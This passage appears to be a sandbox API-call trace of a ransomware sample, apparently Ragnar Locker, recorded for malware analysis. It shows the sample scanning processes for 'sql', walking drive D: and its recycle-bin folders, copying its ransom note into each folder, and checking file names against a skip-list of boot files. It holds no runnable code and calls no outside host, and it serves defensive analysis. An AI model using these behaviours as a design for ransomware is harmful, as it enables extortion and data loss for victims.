dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x35f5408, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0219.760] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0219.760] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0219.760] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1300, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="WerFault.exe")) returned 1 [0219.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WerFault.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.761] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35f5438 [0219.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WerFault.exe", cchWideChar=-1, lpMultiByteStr=0x35f5438, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WerFault.exe", lpUsedDefaultChar=0x0) returned 13 [0219.761] lstrcpyA (in: lpString1=0x567fabc, lpString2="WerFault.exe" | out: lpString1="WerFault.exe") returned="WerFault.exe" [0219.761] StrStrIA (lpFirst="WerFault.exe", lpSrch="sql") returned 0x0 [0219.761] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0219.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0219.762] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x35962c8 [0219.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x35962c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0219.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0219.762] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="sql") returned 0x0 [0219.762] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.764] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35f52e8 [0219.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35f52e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0219.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0219.764] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0219.764] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0219.764] CloseHandle (hObject=0x38c) returned 1 [0219.764] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) Thread: id = 15 os_tid = 0x60 Thread: id = 16 os_tid = 0xb50 Thread: id = 168 os_tid = 0x118c [0161.657] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\*.*", nBufferLength=0x104, lpBuffer=0x5aff1c4, lpFilePart=0x5affc98 | out: lpBuffer="\\\\?\\D:\\*.*", lpFilePart=0x5affc98*="*.*") returned 0xa [0161.657] lstrcpyW (in: lpString1=0x5afefbc, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.657] lstrcpyW (in: lpString1=0x5aff1d2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.657] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5aff7e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5aff7e0) returned 0x35483c0 [0161.657] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0161.658] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0161.658] FindNextFileW (in: hFindFile=0x35483c0, lpFindFileData=0x5aff7e0 | out: lpFindFileData=0x5aff7e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebd2844, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xbebd2844, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$RECYCLE.BIN", cAlternateFileName="")) returned 1 [0161.660] lstrcmpiW (lpString1="$RECYCLE.BIN", lpString2=".") returned -1 [0161.660] lstrcmpiW (lpString1="$RECYCLE.BIN", lpString2="..") returned -1 [0161.660] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\*.*", nBufferLength=0x104, lpBuffer=0x5aff5d8, lpFilePart=0x5affc98 | out: lpBuffer="\\\\?\\D:\\*.*", lpFilePart=0x5affc98*="*.*") returned 0xa [0161.660] lstrcpyW (in: lpString1=0x5aff5e6, lpString2="$RECYCLE.BIN" | out: lpString1="$RECYCLE.BIN") returned="$RECYCLE.BIN" [0161.660] lstrcatW (in: lpString1="\\\\?\\D:\\$RECYCLE.BIN", lpString2="\\" | out: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\") returned="\\\\?\\D:\\$RECYCLE.BIN\\" [0161.660] lstrcpyW (in: lpString1=0x5aff3cc, lpString2="\\\\?\\D:\\$RECYCLE.BIN\\" | out: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\") returned="\\\\?\\D:\\$RECYCLE.BIN\\" [0161.660] lstrcatW (in: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\D:\\$RECYCLE.BIN\\!$R4GN4R_B8CF767A$!.txt" [0161.660] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\D:\\$RECYCLE.BIN\\!$R4GN4R_B8CF767A$!.txt" (normalized: "d:\\$recycle.bin\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0161.664] lstrcatW (in: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\", lpString2="*.*" | out: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\*.*") returned="\\\\?\\D:\\$RECYCLE.BIN\\*.*" [0161.664] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\*.*", nBufferLength=0x104, lpBuffer=0x5afe4b8, lpFilePart=0x5afef8c | out: lpBuffer="\\\\?\\D:\\$RECYCLE.BIN\\*.*", lpFilePart=0x5afef8c*="*.*") returned 0x17 [0161.664] lstrcpyW (in: lpString1=0x5afe2b0, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.664] lstrcpyW (in: lpString1=0x5afe4e0, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.665] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afead4) returned 0x3548300 [0161.665] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.665] FindNextFileW (in: hFindFile=0x3548300, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebd2844, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedb34b38, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.667] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.667] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.667] FindNextFileW (in: hFindFile=0x3548300, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb34b38, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb34b38, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0161.667] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0161.667] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0161.667] FindNextFileW (in: hFindFile=0x3548300, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebf8b22, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xbebf8b22, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="")) returned 1 [0161.667] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".") returned 1 [0161.667] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="..") returned 1 [0161.667] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\*.*", nBufferLength=0x104, lpBuffer=0x5afe8cc, lpFilePart=0x5afef8c | out: lpBuffer="\\\\?\\D:\\$RECYCLE.BIN\\*.*", lpFilePart=0x5afef8c*="*.*") returned 0x17 [0161.668] lstrcpyW (in: lpString1=0x5afe8f4, lpString2="S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="S-1-5-21-1051304884-625712362-2192934891-1000") returned="S-1-5-21-1051304884-625712362-2192934891-1000" [0161.668] lstrcatW (in: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="\\" | out: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\") returned="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\" [0161.668] lstrcpyW (in: lpString1=0x5afe6c0, lpString2="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\" | out: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\") returned="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\" [0161.668] lstrcatW (in: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\!$R4GN4R_B8CF767A$!.txt" [0161.668] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\!$R4GN4R_B8CF767A$!.txt" (normalized: "d:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0161.673] lstrcatW (in: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\", lpString2="*.*" | out: lpString1="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*") returned="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*" [0161.673] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*", nBufferLength=0x104, lpBuffer=0x5afd7ac, lpFilePart=0x5afe280 | out: lpBuffer="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*", lpFilePart=0x5afe280*="*.*") returned 0x45 [0161.673] lstrcpyW (in: lpString1=0x5afd5a4, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.673] lstrcpyW (in: lpString1=0x5afd830, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0161.673] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afddc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afddc8) returned 0x3548400 [0161.673] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.673] FindNextFileW (in: hFindFile=0x3548400, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebf8b22, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedb4aab8, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.795] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.795] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.795] FindNextFileW (in: hFindFile=0x3548400, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb4aab8, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb4aab8, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0161.795] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0161.795] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0161.795] FindNextFileW (in: hFindFile=0x3548400, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbebf8b22, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebf8b22, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xbebf8b22, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.795] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0161.795] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0161.795] FindNextFileW (in: hFindFile=0x3548400, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbebf8b22, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebf8b22, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xbebf8b22, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0161.796] FindClose (in: hFindFile=0x3548400 | out: hFindFile=0x3548400) returned 1 [0161.797] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afddc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afddc8) returned 0x3548a40 [0161.797] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb4aab8, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedb4aab8, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.799] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb4aab8, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb4aab8, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0161.799] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*", nBufferLength=0x104, lpBuffer=0x5afd9b4, lpFilePart=0x5afe280 | out: lpBuffer="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*", lpFilePart=0x5afe280*="*.*") returned 0x45 [0161.799] lstrcpyW (in: lpString1=0x5afda38, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0161.799] PathFindExtensionW (pszPath="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0161.799] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0161.799] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbebf8b22, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebf8b22, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xbebf8b22, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.799] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*", nBufferLength=0x104, lpBuffer=0x5afd9b4, lpFilePart=0x5afe280 | out: lpBuffer="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\*.*", lpFilePart=0x5afe280*="*.*") returned 0x45 [0161.799] lstrcpyW (in: lpString1=0x5afda38, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0161.799] PathFindExtensionW (pszPath="\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned=".ini" [0161.799] lstrcmpiW (lpString1="desktop.ini", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0161.800] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0161.800] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0161.800] lstrcmpiW (lpString1="desktop.ini", lpString2="bootfont.bin") returned 1 [0161.800] lstrcmpiW (lpString1="desktop.ini", lpString2="bootsect.bak") returned 1 [0161.800] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0161.800] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr.efi") returned 1 [0161.800] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgfw.efi") returned 1 [0161.800] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0161.800] FindNextFileW (in: hFindFile=0x3548a40, lpFindFileData=0x5afddc8 | out: lpFindFileData=0x5afddc8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbebf8b22, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebf8b22, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xbebf8b22, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0161.800] FindClose (in: hFindFile=0x3548a40 | out: hFindFile=0x3548a40) returned 1 [0161.800] FindNextFileW (in: hFindFile=0x3548300, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xbebf8b22, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xbebf8b22, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="")) returned 0 [0161.800] FindClose (in: hFindFile=0x3548300 | out: hFindFile=0x3548300) returned 1 [0161.801] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afead4) returned 0x3548400 [0161.802] FindNextFileW (in: hFindFile=0x3548400, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb34b38, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedb34b38, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.803] FindNextFileW (in: hFindFile=0x3548400, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb34b38, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb34b38, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0161.803] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\$RECYCLE.BIN\\*.*", nBufferLength=0x104, lpBuffer=0x5afe6c0, lpFilePart=0x5afef8c | out: lpBuffer="\\\\?\\D:\\$RECYCLE.BIN\\*.*", lpFilePart=0x5afef8c*="*.*") returned 0x17 [0161.803] lstrcpyW (in: lpString1=0x5afe6e8, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0161.803] PathFindExtensionW (pszPath="\\\\?\\D:\\$RECYCLE.BIN\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0161.804] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0161.804] FindNextFileW (in: hFindFile=0x3548400, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb4aab8, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedb4aab8, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="")) returned 1 [0161.804] FindNextFileW (in: hFindFile=0x3548400, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb4aab8, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedb4aab8, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="")) returned 0 [0161.804] FindClose (in: hFindFile=0x3548400 | out: hFindFile=0x3548400) returned 1 [0161.805] FindNextFileW (in: hFindFile=0x35483c0, lpFindFileData=0x5aff7e0 | out: lpFindFileData=0x5aff7e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x21f97274, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0161.805] lstrcmpiW (lpString1="Recovery", lpString2=".") returned 1 [0161.805] lstrcmpiW (lpString1="Recovery", lpString2="..") returned 1 [0161.805] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\*.*", nBufferLength=0x104, 